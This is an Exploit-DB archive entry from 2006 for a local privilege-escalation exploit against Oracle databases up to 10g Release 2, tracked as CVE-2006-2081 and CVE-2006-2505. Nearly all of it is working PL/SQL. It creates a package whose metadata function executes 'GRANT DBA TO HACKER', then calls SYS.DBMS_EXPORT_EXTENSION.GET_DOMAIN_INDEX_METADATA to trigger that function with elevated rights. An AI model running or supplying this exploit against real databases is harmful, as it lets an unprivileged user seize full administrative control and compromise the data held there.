Oracle <= 10g Release 2 DBMS_EXPORT_EXTENSION Local SQL Exploit

2006-04-26T00:00:00
ID EDB-ID:1719
Type exploitdb
Reporter N1V1Hd
Modified 2006-04-26T00:00:00

Description

Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit. CVE-2006-2081,CVE-2006-2505. Local exploits for multiple platform

                                        
                                            /* 0day, description is wrong. /str0ke */

/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/

CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/

CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;

END;
/

DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER';
TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER';
VERSION := '10.2.0.2.0'; GMFLAGS := 1;

v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME =&gt; INDEX_NAME, INDEX_SCHEMA =&gt; INDEX_SCHEMA, TYPE_NAME
=&gt; TYPE_NAME,
TYPE_SCHEMA =&gt; TYPE_SCHEMA, VERSION =&gt; VERSION, NEWBLOCK =&gt;
NEWBLOCK, GMFLAGS =&gt; GMFLAGS
);
END;
/

// milw0rm.com [2006-04-26]